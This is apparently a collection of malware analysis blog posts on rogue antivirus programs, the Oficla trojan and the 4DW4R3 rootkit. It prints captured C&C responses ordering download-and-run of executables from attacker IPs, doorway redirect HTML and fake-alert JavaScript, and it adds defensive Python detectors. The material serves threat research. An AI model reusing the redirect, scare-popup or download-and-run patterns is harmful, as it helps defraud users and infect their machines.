Tag Archives: rogue software

New Rogue Software: Windows Emergency System

Windows Emergency System is another rogue security software that claims to scan the system for errors; instead it displays fake errors and states that the full version of the software must be purchased to fix these non-existent errors.

Windows Emergency System GUI

Screenshot of the installer:

Windows Emergency System Installer

Payment page:

soft-store-inc-com

Network traffic:

GET /soft-usage/favicon.ico?0=1200&1=XXX&2=i&3=85&4=2600&5=5&6=1&7=62900.2096&8=1040 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: soft-store-inc.com

Whois:

Domain Name:	SOFTSTORE-INC.COM
Registrar:	DOMAINCONTEXT, INC.
Whois Server:	whois.domaincontext.com
Referral URL:	http://www.domaincontext.com
Name Server:	NS1.REGWAY.COM
Name Server:	NS2.REGWAY.COM
Status:	clientTransferProhibited
Updated Date:	05-mar-2011
Creation Date:	05-mar-2011
Expiration Date:	05-mar-2012

Network traffic:

GET /payment_forms/default/css/pay.css HTTP/1.1
Referer: http://softstore-inc.com/85/40/form/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: softstore-inc.com

Whois:

Domain Name:	SOFT-STORE-INC.COM
Registrar:	DOMAINCONTEXT, INC.
Whois Server:	whois.domaincontext.com
Referral URL:	http://www.domaincontext.com
Name Server:	NS1.REGWAY.COM
Name Server:	NS2.REGWAY.COM
Status:	clientTransferProhibited
Updated Date:	05-mar-2011
Creation Date:	05-mar-2011
Expiration Date:	05-mar-2012

Malicious domains:

http://www.urlvoid.com/scan/soft-store-inc.com
http://www.urlvoid.com/scan/softstore-inc.com

Other suspicious domains:

http://www.urlvoid.com/scan/getsomepornhere.net
http://www.urlvoid.com/scan/softstorecorp2012.com
http://www.urlvoid.com/scan/softstorecorp2011.com

The malware that installed this rogue software created a few files in the C:\ folder:

C:\kill.txt
C:\avenger.txt
C:\cleanup.exe
C:\TITI.exe

Content of C:\

The malware used a legitimate security tool named “Avenger” to remove antivirus products:

kill.txt

avenger.txt

Fake UPS ZIP Attachments Spreads Oficla Trojan

Some users have submitted a few malware samples to us, received as attachments of fake UPS spam emails. The files are ZIP archives that contain an executable file with the same icon as Microsoft Word documents:

Extracted EXE File

File: Label_UPS_Nr11373.exe
Size: 60928 bytes
Publisher: WUsBjuKspHvMxtas
MD5 hash: ed691cabda1bc5f8447d747558f8b64e
SHA1 hash: 73dee84ca24c24533fdda34e958c4c4c2f635ddf
Detection rate: 5 on 16 (31%)
Status: INFECTED

Files created after the execution of the EXE file:

Files Created

File name: svrwsc-exe
File size: 62464 bytes
MD5 hash: c5ebdc1c45aec27d935a30e74197d402
SHA1 hash: 44c56444557870316389b86c10343beea3245af1
Detection rate: 2 on 16 (13%)
Status: INFECTED

File name: sbxj-lyo
File size: 21504 bytes
MD5 hash: a0528b57e251657ce64e79acfcb45c0a
SHA1 hash: 15df2b7cfda011876e5a3bfca6014390c1b16a2b
Detection rate: 2 on 16 (13%)
Status: INFECTED

File name: ex-08-exe
File size: 259072 bytes
MD5 hash: 3996c77ef6a0b4f365f4d8297bd46c44
SHA1 hash: 05c869267cff02ad999c08565fbe1f266c91a9c0
Detection rate: 2 on 16 (13%)
Status: INFECTED

The file created in the system directory is named sbxj.lyo; it is the main executable of the Oficla trojan, which is used to control the victim’s computer and to install the rogue security software named Security Tool.

Network Traffic:

GET /mydog/bb.php?v=200&id=XXX&b=13oktabr&tm=2 HTTP/1.1
User-Agent: Opera\9.64
Host: webauc. ru

Response:

[info]runurl:hxxp://91.204.48.46 /test/morph.exe|taskid:16|delay:15|upd:0|backurls:[/info]

Network Traffic:

GET /test/morph.exe HTTP/1.1
User-Agent: Opera\9.64
Host: 91.204.48.46

Response:

HTTP/1.1 200 OK
Date: Wed, 20 Oct 2010 15:58:45 GMT
Content-Disposition: attachment; filename="morph.exe"
Content-Transfer-Encoding: binary
Content-Length: 62464
Content-Type: application/octet-stream

Network Traffic:

GET /mydog/bb.php?v=200&id=XXX&tid=16&b=13oktabr&r=1&tm=2 HTTP/1.1
User-Agent: Opera\9.64
Host: webauc. ru

Response:

[info]kill:0|runurl:http://91.204.48.46 /test/69.exe|taskid:13|delay:15|upd:0|backurls:[/info]

Network Traffic:

GET /test/69.exe HTTP/1.1
User-Agent: Opera\9.64
Host: 91.204.48.46

Response:

HTTP/1.1 200 OK
Date: Wed, 20 Oct 2010 15:58:47 GMT
Content-Disposition: attachment; filename="69.exe"
Content-Transfer-Encoding: binary
Content-Length: 15360
Content-Type: application/octet-stream

From the above network traffic we can see that the main executable of the Oficla trojan has started to receive commands from the C&C server: it is instructed to download two new malicious executables, named morph.exe and 69.exe, and to execute the newly downloaded files on the victim’s computer.

Network Traffic:

GET /avpsoft_dfhljkghsdflg.exe HTTP/1.0
Host: 188.65.74.163

Response:

HTTP/1.1 200 OK
Date: Wed, 20 Oct 2010 15:57:46 GMT
Content-Type: application/octet-stream
Content-Length: 987648
Last-Modified: Wed, 20 Oct 2010 15:57:32 GMT

The file avpsoft_dfhljkghsdflg.exe is the executable of the rogue security software, named Security Tool, that will be installed on our infected system. After its execution, we noticed new popup windows appear:

Popup Window

Security Tool has been fully installed:

Security Tool GUI

Files created during the installation of Security Tool:

Documents and Settings\user\Local Settings\Application Data\2730621030.exe
Documents and Settings\user\Start Menu\Programs\Security Tool.lnk

File name: 2730621030-exe
File size: 987648 bytes
MD5 hash: 493366362d69acf11996d96e33fabd65
SHA1 hash: 5f3a4dbb6a139c21eac250e61587562d1e24ac82
Detection rate: 2 on 16 (13%)
Status: INFECTED

Network Traffic:

POST /us/federal/index.php HTTP/1.0
Accept: */*
Host: padreim. ru

Response:

HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 6191
 

The response body is a list of wildcard patterns for online-banking URLs: the malware wants to filter domains related to bank accounts…

Network Traffic:

GET /outlook.exe HTTP/1.0
Host: 109.196.143.135

Response:

HTTP/1.1 200 OK
Server: nginx/0.8.34
Date: Wed, 20 Oct 2010 15:57:51 GMT
Content-Type: application/octet-stream
Content-Length: 259072
Last-Modified: Wed, 20 Oct 2010 15:08:46 GMT
Accept-Ranges: bytes

Security Tool tries to connect to a fraudulent payment system:

GET /buy.php?q=0a70fbd0279e74fbaa0e7469ec5182ba HTTP/1.1
Host: fastpayform. biz

The title of the HTML page is:

<title>Security Tool - Payment Page</title>

Network Traffic:

GET /cb_soft.php?q=0a70fbd0279e74fbaa0e7469ec5182ba HTTP/1.1
Host: 77.78.201.23

Domain & IP Analysis:

webauc. ru – 85.195.104.162
91.204.48.46 – –
188.65.74.163 – –
109.196.143.135 – –
fastpayform. biz – 195.3.145.46
77.78.201.23 – b201c23.pptp-gw51.cable-internet.GlobalNET.ba

BlackHat SEO Campaign used to spread Smart Engine

A new blackhat SEO campaign is distributing the setup installer of a new rogue security software named Smart Engine. The spread looks quite aggressive: we have logged more than 2000 infected websites that are used to capture popular keywords and to redirect users to malicious URLs or to fake scanner pages, with the intent of installing the rogue software.

When a user clicks on an infected URL, there is a redirection:

<html>
<head>
<title></title>
<meta http-equiv="refresh" content="0; url=hxxp://www4.get-bestlink3 .co.cc/?30650ebe=XXX">
</head>
<body>
<script language="javascript">
self.location.href = "hxxp://www4.get-bestlink3 .co.cc/?30650ebe=XXX";
</script>
<a href="hxxp://www4.get-bestlink3 .co.cc/?30650ebe=XXX">Please Click Here</a>
</body>
</html>

Domain & IP Analysis:

www4.get-bestlink3 .co.cc
209.212.149.22 – ip-209.212.149.22.servernap.net

Another redirection:

HTTP/1.1 302 Moved Temporarily
Location: hxxp://www2.best-install10 .co.cc/?p=XXX

Domain & IP Analysis:

www2.best-install10 .co.cc
212.117.168.150 – ip-212-117-168-150.server.lu

And now we can see the fake scanner page:

Fake Scanner Page

After a short time, the download of an executable is prompted:

Executable File Download

Location: hxxp://www2.doit-nowandfast .net/ejvlkn107_2211.php?p=XXX
HTTP/1.1 200 OK
Content-Type: application/octetstream
Pragma: hack
Content-Length: 270336
Content-Disposition: attachment; filename=packupdate107_2211.exe
Content-Transfer-Encoding: binary
Set-Cookie: ds=1

Domain & IP Analysis:

www2.doit-nowandfast .net
188.65.74.86 – –

The downloaded file is the installer of the Smart Engine rogue security software:

Smart Engine Installer

Main GUI of Smart Engine:

Smart Engine GUI

The Smart Engine main executable tries to connect to a remote host:

Windows Firewall Alert

GET /index.php?0d40b0=mNjf0tXm1J2a0du01sLl35A%3D HTTP/1.0
Host: update1.liwnarwlentoristorg910 .net
 
GET /?0d40b0=XXX HTTP/1.0
Host: report1.liwnarwlentoristorg910 .net

DNS Queries:

www5.smart-engine .net
secure1.buy-the-guardian .com

Domain & IP Analysis:

update1.liwnarwlentoristorg910 .net
188.65.74.83 – –
report1.liwnarwlentoristorg910 .net
209.222.8.102 – 209.222.8.102.choopa.net

Activation page:

Smart Engine Activation Page

GET /?kp=kdTHxeevuH5zneDK4eiso1Pk28WhmJI%3D HTTP/1.1
Host: secure1.wlentor-traden-quzonk-1 .com

Domain & IP Analysis:

secure1.wlentor-traden-quzonk-1 .com
69.57.173.219 – –

Smart Engine is sold for:

$49.95 -> 6 Month Guard Subscription
$69.95 -> 1 Year Guard Subscription
$89.95 -> Lifetime Guard Subscription

Network traffic:

HEAD / HTTP/1.1
Host: update1.wlentor-traden-quzonk-1 .com
 
HEAD / HTTP/1.1
Host: report1.wlentor-traden-quzonk-1 .com
 
HEAD / HTTP/1.1
Host: www5.wlentor-traden-quzonk-1 .com

Domain & IP Analysis:

update1.wlentor-traden-quzonk-1 .com
173.244.223.32 – 173.244.223.32.static.midphase.com
report1.wlentor-traden-quzonk-1 .com
173.244.223.37 – 173.244.223.37.static.midphase.com
www5.wlentor-traden-quzonk-1 .com
69.57.173.221 – –

The subdomain used for the activation page changed IP address a few times during the analysis:

09/10/2010 14.32.58 # secure1.wlentor-traden-quzonk-1 .com # 209.212.149.23
09/10/2010 14.32.57 # secure1.wlentor-traden-quzonk-1 .com # 69.57.173.219

Network traffic:

GET /?xohmdu=XXX HTTP/1.1
Host: update1.wlentor-traden-quzonk-1 .com

Response:

Content-Type: application/octetstream
Pragma: hack
Content-Length: 1307
Content-Disposition: attachment; filename=04869.ini
Content-Transfer-Encoding: binary

GET /?pg=XXX HTTP/1.1
Host: report1.wlentor-traden-quzonk671 .com

Domain & IP Analysis:

report1.wlentor-traden-quzonk671 .com
174.36.42.71 – amu.furumoon.net

The subdomain changed IP address a few times during the analysis:

09/10/2010 14.33.04 # report1.wlentor-traden-quzonk671 .com # 174.36.42.71
09/10/2010 14.33.06 # report1.wlentor-traden-quzonk671 .com # 209.222.8.100

DNS Queries:

cilt442vyabkqqv.com
cilt442vyabkqqv.com (response contains: v=spf1 a mx ip4:209.222.8.100/22 ?all)

The malware queried an external URL to learn our public IP address:

GET /get_ip.php?loc= HTTP/1.1
Host: www.myip .ru

After a short time, we noticed a connection loop:

HEAD / HTTP/1.1
User-Agent: Sm17a_2211
Host: 74.125.45.100
 
HEAD / HTTP/1.0
User-Agent: Sm17a_2211
Host: 74.125.45.100
 
HEAD / HTTP/1.0
User-Agent: Sm17a_2211
Host: 74.125.45.100

It looks like it tried to connect to a Google IP to check whether the victim is online.

New domain used for payments; note the HTTPS:

Location: hxxps://secure.onlinesystempayment .com/?abbr=SME&price_name=6month&ext3=2211&ext1=MD5HASH&ext2=wvXP;b_IE6;107;11111;MainWindow;day;671;1;0&card=visa

Domain & IP Analysis:

secure.onlinesystempayment .com
209.212.149.23 – ip-209.212.149.23.servernap.net

New connection on port 443:

Remote Address    : 96.9.160.110
Remote Port       : 443
Service Name      : https

IP Analysis:

96.9.160.110 – 96-9-160-110.hostnoc.net

The malware also queried a legitimate website related to SSL certificates:

GET /GLOBESSLDomainValidatedCA.crt HTTP/1.1
User-Agent: Microsoft-CryptoAPI/5.131.2600.2180
Host: crt.globessl.com

Files created during the installation of the rogue security software:

Files Created

Created desktop icon:

Desktop Icon

Smart Engine installed files:

Smart Engine Files

The hosts file has been modified and now has the +S (System) attribute:

Hosts File System Attribute

Hosts file content:

Hosts File Content

eFax False Email Spreads Antimalware Doctor

This morning we received an interesting email from a fake eFax, with a suspicious ZIP archive (.ZIP) attached; the subject of the email stated that we had received a fax (“You’ve got a fax”). The strange part is that the ZIP file contains an executable file (.EXE) with the icon of MS Word.

Image

Report date: 2010-09-17 13:42:07 (GMT 1)
File name: efax-97901doc-exe
File size: 43008 bytes
MD5 hash: 5276e96227570b2bf6ec85a306db1027
SHA1 hash: 60fe4ecb7cb2b6e9c3173223c35b0fee3aa5149a
Detection rate: 6 on 16 (38%)
Status: INFECTED
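Both the fake UPS and the fake eFax mails above hide an executable behind a document icon inside a ZIP attachment. The following Python helper is an added example, not code from the original posts: it is what a mail gateway or analyst script could run over an attachment, opening the archive in memory and flagging any member whose name has an executable extension or whose content starts with the PE “MZ” magic, whatever its name. The sample archive is constructed inline with the file names from the posts; the “MZ” stubs are placeholders, not the real samples.

```python
import io
import zipfile

# Extensions Windows will execute directly; a ZIP attachment holding one of
# these is almost never a legitimate fax or shipping label.
EXECUTABLE_EXTS = (".exe", ".scr", ".pif", ".com", ".bat", ".cmd", ".vbs", ".js")
PE_MAGIC = b"MZ"


def suspicious_members(zip_bytes: bytes) -> list:
    """Return (member_name, reason) pairs for ZIP members that look like executables.

    Both the name and the first bytes are checked, so an EXE renamed to look
    like a document and a .exe shown with a Word icon are both caught.
    """
    findings = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            name = info.filename
            reasons = []
            if name.lower().endswith(EXECUTABLE_EXTS):
                reasons.append("executable extension")
            with zf.open(info) as fh:
                head = fh.read(2)
            if head == PE_MAGIC:
                reasons.append("PE (MZ) header")
            if reasons:
                findings.append((name, ", ".join(reasons)))
    return findings


def build_sample_zip() -> bytes:
    """Constructed sample: the member names come from the posts above; the
    bodies are placeholder bytes, not the real malware."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Label_UPS_Nr11373.exe", PE_MAGIC + b"\x90\x00" * 32)
        # Same stub with the extension stripped: caught by the magic check only.
        zf.writestr("efax-97901doc", PE_MAGIC + b"\x90\x00" * 32)
        zf.writestr("readme.txt", b"Your fax is attached.\n")
    return buf.getvalue()


if __name__ == "__main__":
    for name, reason in suspicious_members(build_sample_zip()):
        print(f"BLOCK {name}: {reason}")
```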

The details of the message source of the received emails are as follows:

Image

From: “eFax” efax(at)efax.com
Received: from efax.com (unknown [95.139.213.105])
Subject: You’ve got a fax
Date: Thu, 16 Sep 2010 15:36:03 +0400
MIME-Version: 1.0
Content-Type: multipart/mixed;

We have executed the file in our sandbox and this is the file activity:

Image

The file created in the system directory is named hyli.igo; it is the main executable of the Oficla trojan, which is used to control the victim’s computer and to install the rogue security software Antimalware Doctor.

Network Traffic:

GET /group/mixer/bb.php?v=200&id=XXX&b=XXX&tm=0 HTTP/1.1
User-Agent: Opera\9.64
Host: moneymader .ru

Response:

[info]delay:15|upd:1|backurls:hxxp://91.204.48.46 /milk/69.exe[/info]

The malware connected to the C&C server of the Oficla trojan to receive new commands from the bot owner; from the response to the GET query we can see that the malware received the command to update itself (“upd:1”) with a new binary located at the “backurls:” address.
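The [info]…[/info] responses in this post and in the fake UPS post above share one command format: key:value pairs separated by “|”. The Python parser below is an added example, not code from the original posts; it extracts the commands and the URLs a defender would block or hunt for. The beacon line and the responses are copied from the captures above (URLs kept defanged as the posts show them), and the beacon-recognition heuristic is my own assumption, not a published signature.

```python
import re
from urllib.parse import urlsplit, parse_qs

INFO_RE = re.compile(r"\[info\](.*?)\[/info\]", re.DOTALL)
URL_KEYS = ("runurl", "backurls")


def parse_oficla_response(body: str) -> dict:
    """Split one [info]...[/info] block into a {command: value} dict.

    Values may be empty (e.g. 'backurls:' with no URL) and URLs contain ':',
    so only the first ':' of each token separates key from value.
    """
    m = INFO_RE.search(body)
    if not m:
        return {}
    cmds = {}
    for token in m.group(1).split("|"):
        key, sep, value = token.partition(":")
        if sep:
            cmds[key.strip()] = value.strip()
    return cmds


def triage_response(body: str) -> dict:
    """Summarise what the bot was told to do and which URLs to block."""
    cmds = parse_oficla_response(body)
    urls = [cmds[k] for k in URL_KEYS if cmds.get(k)]
    return {
        "task_id": cmds.get("taskid"),
        "download_and_run": bool(cmds.get("runurl")),
        "self_update": cmds.get("upd") == "1",
        "kill_bot": cmds.get("kill") == "1",
        "beacon_delay_s": int(cmds["delay"]) if cmds.get("delay", "").isdigit() else None,
        "urls_to_block": urls,
    }


def looks_like_oficla_beacon(request_line: str) -> bool:
    """Assumed heuristic: a GET to bb.php carrying the v/id/b/tm parameters
    seen in the captures. Use it as a hunting query, not a sole alert source."""
    parts = request_line.split()
    if len(parts) < 2 or parts[0] != "GET":
        return False
    url = urlsplit(parts[1])
    if not url.path.endswith("/bb.php"):
        return False
    params = parse_qs(url.query)
    return {"v", "id", "b", "tm"} <= set(params)


# Constructed samples copied from the captures in the two Oficla posts.
BEACON = "GET /group/mixer/bb.php?v=200&id=XXX&b=XXX&tm=0 HTTP/1.1"
RESPONSES = [
    "[info]runurl:hxxp://91.204.48.46 /test/morph.exe|taskid:16|delay:15|upd:0|backurls:[/info]",
    "[info]kill:0|runurl:http://91.204.48.46 /test/69.exe|taskid:13|delay:15|upd:0|backurls:[/info]",
    "[info]delay:15|upd:1|backurls:hxxp://91.204.48.46 /milk/69.exe[/info]",
]

if __name__ == "__main__":
    print("beacon:", looks_like_oficla_beacon(BEACON))
    for r in RESPONSES:
        print(triage_response(r))
```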

Next we noticed that the Oficla trojan started to download the Antimalware Doctor installer; as the image below shows, it looks like an installer for Microsoft Windows Updates, but it will install the rogue security software Antimalware Doctor instead:

Image

Common symptoms of a rogue security software infection are the repeated false security alerts stating that the user’s system is infected by a large number of trojans; the user is then pushed to click the “Remove Threats” button, which opens the main program and runs a fake system scan:

Image

This is the main GUI of Antimalware Doctor:

Image

Task manager has also been disabled:

Image

New Network Traffic:

GET /inst.php?do=2&a=XXX&b=en&c=XXX&d=10&e=Win5.1.2600SP2 HTTP/1.1
Host: s.statst .in
 
GET /load/load.php?a=XXX&b=en&c=XXX&e=Win5.1.2600SP2 HTTP/1.1
Host: statst .in
 
GET /setup710binfile.exe HTTP/1.1
Host: outgtrf .in
 
GET /install.php?do=1&coid=XXX&fff=XXX&IP=XXX&lct=ITA&v=X240 HTTP/1.1
Host: s.statst .in

Antimalware Doctor started to display fake security alerts that redirected to the website used to purchase this rogue security software. Keep in mind that all the payment systems used by these rogues are fraudulent and in most cases can even steal the credit card details entered during the payment process:

GET /purchase.php?aaa=csp&fff=XXX&sbb=X240-1-aftscann&lct=ITA&ttt=1&tns=1&sss=2&nocashe=1 HTTP/1.1
Host: statst .in

SSL Connection used during payments:

83.133.115.9:443

Domain & IP Analysis:

moneymader .ru / 109.196.134.44
91.204.48.46
outgtrf .in / 89.187.53.250
s.statst.in / 85.234.191.21
statst.in / 85.234.191.21
83.133.115.9

BlackHat SEO Attacks Redirect to 4DW4R3 Rootkit

We have analyzed a new blackhat SEO attack these days and noticed that the main target of these attacks is no longer the spread of rogue security software; instead they try to spread the dangerous 4DW4R3 rootkit, through which they may later install a new rogue security software on the victim’s computer.

Below is a small analysis of the network traffic we captured during the analysis of these new blackhat SEO attacks. The targeted keywords are mostly related to the iPhone, episodes of cartoons and World Cup 2010 matches.

Hijacked URL:

traseusa .com/images/page.php?r=keyword

Response:

<html>
<head>
<title></title>
<meta http-equiv="refresh" content="0; url=hxxp://portalkey .org/?affid=415&subid=landing">
</head>
<body>
<script language="javascript">
self.location.href = "hxxp://portalkey .org/?affid=415&subid=landing";
</script>
<a href="hxxp://portalkey .org/?affid=415&subid=landing">Please Click Here</a>
</body>
</html>
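The redirect page above and the one in the Smart Engine post share one doorway pattern: an empty title, a zero-delay meta refresh, a script that rewrites location, and a “Please Click Here” fallback link, all pointing at the same URL. The Python checker below is an added example, not code from the original posts: it collects every redirect target from a fetched page and flags that pattern, which is useful for triaging crawled pages from hijacked sites. The sample is the redirect page copied from the Smart Engine post; the thresholds are my own assumptions.

```python
import re
from html.parser import HTMLParser

META_REFRESH_RE = re.compile(r"^\s*(\d+)\s*;\s*url\s*=\s*['\"]?([^'\"]+)", re.I)
LOCATION_RE = re.compile(
    r"(?:self|window|top|document)\.location(?:\.href)?\s*=\s*['\"]([^'\"]+)['\"]")


class RedirectCollector(HTMLParser):
    """Collect every way the page can move the browser on: meta refresh,
    script-driven location changes and plain links, plus the page title."""

    def __init__(self):
        super().__init__()
        self.meta_refresh, self.script_targets, self.links = [], [], []
        self.title, self._mode = "", None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "meta" and (a.get("http-equiv") or "").lower() == "refresh":
            m = META_REFRESH_RE.match(a.get("content") or "")
            if m:
                self.meta_refresh.append((int(m.group(1)), m.group(2).strip()))
        elif tag == "a" and a.get("href"):
            self.links.append(a["href"])
        elif tag in ("script", "title"):
            self._mode = tag

    def handle_endtag(self, tag):
        if tag == self._mode:
            self._mode = None

    def handle_data(self, data):
        if self._mode == "script":
            self.script_targets.extend(LOCATION_RE.findall(data))
        elif self._mode == "title":
            self.title += data


def is_doorway_redirect(html: str) -> dict:
    """Flag the doorway pattern from the posts: empty title, zero-delay meta
    refresh, a script location change and a fallback link, all to one URL."""
    p = RedirectCollector()
    p.feed(html)
    targets = {u for _, u in p.meta_refresh} | set(p.script_targets) | set(p.links)
    instant = any(delay == 0 for delay, _ in p.meta_refresh)
    doorway = instant and len(targets) == 1 and bool(p.script_targets) and not p.title.strip()
    return {"doorway": doorway, "targets": sorted(targets)}


# Constructed sample: the redirect page copied from the Smart Engine post above.
SAMPLE_DOORWAY = """<html>
<head>
<title></title>
<meta http-equiv="refresh" content="0; url=hxxp://www4.get-bestlink3 .co.cc/?30650ebe=XXX">
</head>
<body>
<script language="javascript">
self.location.href = "hxxp://www4.get-bestlink3 .co.cc/?30650ebe=XXX";
</script>
<a href="hxxp://www4.get-bestlink3 .co.cc/?30650ebe=XXX">Please Click Here</a>
</body>
</html>"""
```

Calling is_doorway_redirect(SAMPLE_DOORWAY) returns the single target URL with doorway set to True; an ordinary page with a titled head and a delayed refresh is not flagged.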

Domain & IP Analysis:

portalkey .org – 91.212.127.96

The domain portalkey .org is used to display fake security alerts and false system scan reports to the user, showing that the system is completely infected by trojans:

Image

By analyzing the source of the HTML page, we can see that it uses JavaScript to display the fake alerts and the fake system scan reports; as an example, we have extracted a few lines of code from the infected page:

{
	alert(this.___("Windows Security Center recommends you to install System Security Antivirus."));
	t.MyConfirm();
}

Image

ExitPopupMessage():

ExitPopupMessage : function()
{
	alert(this.___("Your computer remains infected by viruses!") +
	this.___("They can cause data loss and file damages and need to be cured as soon as possible.") + "\n\n" +
	this.___("Return to System Security and download it secure to your PC"));
}

In particular, the above code is executed every time the user tries to close Internet Explorer, and it forces the user to open the infected page again in Internet Explorer even if the user clicks the “Cancel” button! This can be regarded as persistence code whose main intent is to make sure the user will, sooner or later, click on the malicious page to download the rootkit executable.

clicksmell .org/x92s/uc12vx04/xdtldil.php?id=369

Domain & IP Analysis:

clicksmell .org – 91.188.59.220

Next, the download of the 4DW4R3 executable is requested:

portalkey .org/dl.php?f=XXX&subid=1

Image

Response:

HTTP/1.1 200 OK
Server: nginx/0.7.63
Content-Type: application/octet-stream
Pragma: hack
Content-Length: 11776
Content-Disposition: attachment; filename=WinSecurityInstaller.exe
Content-Transfer-Encoding: binary

Note that the executable file is named like the executable of a rogue security software, “WinSecurityInstaller.exe”, but in reality it will install the 4DW4R3 rootkit…

Cookies:

Cookie: NOT_UNIQUE=1; USER_DATA=XXX; TEMPLATE=XXX; affid=409; subid=landing

We have executed the rootkit loader in our sandbox:

Image

Network activity:

GET /a/ad HTTP/1.1
Host: www.searchannoying .org
 
GET /any3/5-direct.ex HTTP/1.1
User-Agent: wget 3.0
Host: searchannoying .org
 
POST /css/pragma/knock.php HTTP/1.1
Host: analitycsdead .com
 
GET /css/pragma/crcmds/main HTTP/1.0
Host: analitycsdead .com
 
GET /css/pragma/srcr.dat HTTP/1.0
Host: analitycsdead .com
 
GET /css/pragma/crcmds/install HTTP/1.0
Host: analitycsdead .com
 
GET /css/pragma/crfiles/serf HTTP/1.0
Host: analitycsdead .com
 
GET /css/pragma/crfiles/bbr HTTP/1.0
Host: analitycsdead .com
 
GET /readdatagateway.php?type=stats&affid=415&subid=landing&version=4.0&adwareok HTTP/1.1
User-Agent: wget 3.0
Host: searchannoying .org

Domain & IP Analysis:

searchannoying .org – 91.212.127.96
analitycsdead .com – 62.122.73.242

Files in Temp Directory:

Image

After a few hours, this new window popped up:

Image

Surprise? No… it is a rogue security software installer…